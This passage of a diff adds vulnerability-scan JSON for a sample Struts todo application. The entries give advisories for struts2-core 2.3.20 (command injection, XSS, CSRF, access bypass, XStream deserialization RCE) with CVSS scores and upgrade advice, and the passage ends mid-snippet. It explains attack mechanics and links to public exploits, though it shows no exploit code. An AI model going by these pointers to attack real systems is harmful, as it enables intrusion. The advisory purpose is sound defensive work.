"insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "http://struts.apache.org/docs/s2-026.html", + "title": "Vulnerability Summary" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:49:01.496065Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + 
"modificationTime": "2024-03-06T13:57:56.364720Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:49:01.496065Z" + } + ], + "description": "## Overview\n`ValueStack` defines special `top` object which represents root of execution context. It can be used to manipulate Struts' internals or can be used to affect container's settings.\n\n## References\n- [http://struts.apache.org/docs/s2-026.html](http://struts.apache.org/docs/s2-026.html)\n", + "epssDetails": { + "percentile": "0.70008", + "probability": "0.00305", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-5209" + ], + "CWE": [ + "CWE-284" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2016-12-25T16:51:56Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2015-07-01T16:51:56Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2015-07-01T16:51:56Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:49:01.496065Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.24.1" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-30770", + "title": "Command Injection", + "CVSSv3": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0.0, 2.3.20.2)", + "[2.3.24, 2.3.24.2)", + "[2.3.28, 2.3.28.1)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.3.20.2", + "2.3.24.2", + "2.3.28.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://exploit-db.com/exploits/39756", + "title": "Exploit DB" + }, + { + "url": "https://github.com/apache/struts/commit/f238cf4f1091be19fbcfd086b042c86a1bcaa7fc", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3081", + "title": "NVD" + }, + { + "url": "https://www.exploit-db.com/exploits/39756", + "title": "Exploit DB" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2016/CVE-2016-3081.yaml", + "title": "Nuclei Templates" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:46:47.334921Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:02.554699Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:47.334921Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming 
language.\n\nAffected versions of this package are vulnerable to Command Injection. When Dynamic Method Invocation was enabled, a remote attackers could execute arbitrary code via the prefix method, related to chained expressions.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.20.2, 2.3.24.2, 2.3.28.1 or higher.\n## References\n- [Exploit DB](https://exploit-db.com/exploits/39756)\n- [GitHub Commit](https://github.com/apache/struts/commit/f238cf4f1091be19fbcfd086b042c86a1bcaa7fc)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3081)\n- [Exploit DB](https://www.exploit-db.com/exploits/39756)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2016/CVE-2016-3081.yaml)\n", + "epssDetails": { + "percentile": "0.99987", + "probability": "0.97524", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-3081" + ], + "CWE": [ + "CWE-77" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.315000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-04-22T04:32:51Z", + "exploitDetails": { + "sources": [ + "ExploitDB", + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2016-04-22T04:32:51Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:20.892839Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.20.3" + ], + "isUpgradable": true, + "isPatchable": false, + 
"name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-30773", + "title": "Cross-site Scripting (XSS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.3.28)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.28" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 6.1, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/5421930b49822606792f36653b17d3d95ef106f9", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/72471d7075681bea52046645ad7aa34e9c53751e", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/a89bbe22cd2461748d595a89a254de888a415e6c", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4003", + "title": "NVD" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "cvssV3BaseScore": 6.1, + "modificationTime": "2024-03-11T09:46:54.345030Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 6.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:27.272926Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:54.345030Z" + } + ], + "description": "## Overview\n[`org.apache.struts:struts2-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22struts2-core%22)\nCross-site Scripting (XSS) vulnerability in 
the URLDecoder function in JRE before 1.8, as used in Apache Struts 2.x before 2.3.28, when using a single byte page encoding, allows remote attackers to inject arbitrary web script or HTML via multi-byte characters in a url-encoded parameter.\n\n## Details\nA cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a request as originating from a trusted source.\r\n\r\nThis is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.\r\n\r\nֿInjecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.\r\n\r\nEscaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, `<` can be coded as `<`; and `>` can be coded as `>`; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. 
If malicious content is injected into an application that escapes special characters and that malicious content uses `<` and `>` as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.\r\n \r\nThe most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware. \r\n\r\n### Types of attacks\r\nThere are a few methods by which XSS can be manipulated:\r\n\r\n|Type|Origin|Description|\r\n|--|--|--|\r\n|**Stored**|Server|The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.|\r\n|**Reflected**|Server|The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.| \r\n|**DOM-based**|Client|The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.|\r\n|**Mutated**| |The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. 
An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.|\r\n\r\n### Affected environments\r\nThe following environments are susceptible to an XSS attack:\r\n\r\n* Web servers\r\n* Application servers\r\n* Web application environments\r\n\r\n### How to prevent\r\nThis section describes the top best practices designed to specifically protect your code: \r\n\r\n* Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches. \r\n* Convert special characters such as `?`, `&`, `/`, `<`, `>` and spaces to their respective HTML or URL encoded equivalents. \r\n* Give users the option to disable client-side scripts.\r\n* Redirect invalid requests.\r\n* Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.\r\n* Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.\r\n* Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.\n\n\n## References\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4003)", + "epssDetails": { + "percentile": "0.88699", + "probability": "0.01905", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-4003" + ], + "CWE": [ + "CWE-79" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.353000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-03-16T06:52:13.014000Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + 
"mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2016-03-16T06:52:13.014000Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:54.345030Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.28" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-30774", + "title": "Cross-site Request Forgery (CSRF)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "credit": [ + "Takeshi Terada" + ], + "semver": { + "vulnerable": [ + "[2.3.20,2.3.29)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.29" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://struts.apache.org/docs/s2-038.html", + "title": "Apache Struts Security Bulletin" + }, + { + "url": "https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4430", + "title": "NVD" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:46:55.023333Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:09.208211Z" + }, + { + "type": 
"secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:55.023333Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Cross-site Request Forgery (CSRF). It mishandles token validation, which allows remote attackers to conduct CSRF attacks via unspecified vectors.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.29 or higher.\n## References\n- [Apache Struts Security Bulletin](https://struts.apache.org/docs/s2-038.html)\n- [GitHub Commit](https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4430)\n", + "epssDetails": { + "percentile": "0.75315", + "probability": "0.00450", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-4430" + ], + "CWE": [ + "CWE-352" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.364000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-06-20T07:00:37Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2016-06-20T07:00:37Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:55.023333Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + 
"org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.29" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-30775", + "title": "Access Restriction Bypass", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "credit": [ + "Takeshi Terada" + ], + "semver": { + "vulnerable": [ + "[2.3.20,2.3.29)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.29" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://struts.apache.org/docs/s2-040.html", + "title": "Apache Struts Security Bulletin" + }, + { + "url": "https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4431", + "title": "NVD" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:46:55.000380Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:37.211840Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:55.000380Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web 
applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Access Restriction Bypass. It allows remote attackers to bypass intended access restrictions and conduct redirection attacks by leveraging a default method.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.29 or higher.\n## References\n- [Apache Struts Security Bulletin](https://struts.apache.org/docs/s2-040.html)\n- [GitHub Commit](https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4431)\n", + "epssDetails": { + "percentile": "0.83001", + "probability": "0.00914", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-4431" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.377000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-06-21T04:49:27Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2016-06-21T04:49:27Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:55.000380Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.29" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-30776", + "title": "Access Restriction Bypass", + "CVSSv3": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "credit": [ + "Takeshi Terada" + ], + "semver": { + "vulnerable": [ + "[2.3.20, 2.3.29)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.29" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4433", + "title": "NVD" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:46:52.478661Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:39.417349Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:52.478661Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Access Restriction Bypass. 
It allows remote attackers to bypass intended access restrictions and conduct redirection attacks via a crafted request.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.29 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4433)\n", + "epssDetails": { + "percentile": "0.77304", + "probability": "0.00531", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-4433" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.390000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-06-21T01:33:07Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2016-06-21T01:33:07Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:52.478661Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.29" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-31495", + "title": "Arbitrary Command Execution", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:R", + "credit": [ + "LGTM Security Team" + ], + "semver": { + "vulnerable": [ + "[,2.3.34)", + "[2.4,2.5.13)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.3.34", + "2.5.13" + ], + 
"patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://cwiki.apache.org/confluence/display/WW/S2-052", + "title": "Apache Security Bulletin" + }, + { + "url": "https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax", + "title": "Apache Struts Statement on Equifax Security Breach" + }, + { + "url": "https://www.exploit-db.com/exploits/42627", + "title": "Exploit DB" + }, + { + "url": "https://github.com/apache/struts/commit/19494718865f2fb7da5ea363de3822f87fbda26", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/6dd6e5cfb7b5e020abffe7e8091bd63fe97c10a", + "title": "GitHub Commit" + }, + { + "url": "https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement", + "title": "LGTM Advisory" + }, + { + "url": "https://lgtm.com/blog/apache_struts_CVE-2017-9805", + "title": "LGTM Vulnerability Details" + }, + { + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", + "title": "CISA - Known Exploited Vulnerabilities" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2017/CVE-2017-9805.yaml", + "title": "Nuclei Templates" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:47:48.667611Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:R", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:15.532569Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + 
"baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:48.667611Z" + } + ], + "description": "## Overview\r\n[Apache Struts2](http://struts.apache.org/) is a popular open-source framework for developing web applications in the Java programming language.\r\n\r\nThe REST Plugin in affected versions use a `XStreamHandler` with an instance of XStream for deserialization without any type filtering. By design, there are few limits to the type of objects XStream can handle. This flexibility comes at a price. The XML generated or consumed by XStream includes all information required to build Java objects of almost any type. The provided XML data is used by XStream to unmarshal Java objects. An attacker could use this flaw to execute arbitrary code or conduct further attacks.\r\n\r\n[A working exploit](https://github.com/rapid7/metasploit-framework/commit/5ea83fee5ee8c23ad95608b7e2022db5b48340ef) is publicly available and [is actively](https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/) exploited in the wild.\r\n\r\nYou can read more about this vulnerability [on our blog](https://snyk.io/blog/equifax-breach-vulnerable-open-source-libraries/).\r\n\r\n# Details\r\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). 
It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\r\n\r\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker control the state or the flow of the execution. \r\n\r\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\r\n\r\nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\r\n\r\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\r\n- Apache Blog\r\n\r\n\r\n## Remediation\r\nDevelopers are strongly advised to upgrade their _Apache Struts_ components to version `2.3.34`, `2.5.13` or higher.\r\n\r\nIt is possible that some REST actions stop working because of applied default restrictions on available classes. In this case please investigate the new interfaces that were introduced to allow class restrictions per action, those interfaces are:\r\n* org.apache.struts2.rest.handler.AllowedClasses\r\n* org.apache.struts2.rest.handler.AllowedClassNames\r\n* org.apache.struts2.rest.handler.XStreamPermissionProvider\r\n\r\nIf for some reason upgrading is not an option, consider the following workarounds:\r\n1. Disable handling XML pages and requests to such pages\r\n```xml\r\n\r\n```\r\n\r\n2. Override getContentType in XStreamHandler\r\n```java\r\n public class MyXStreamHandler extends XStreamHandler { \r\n public String getContentType() {\r\n return \"not-existing-content-type-@;/&%$#@\";\r\n }\r\n 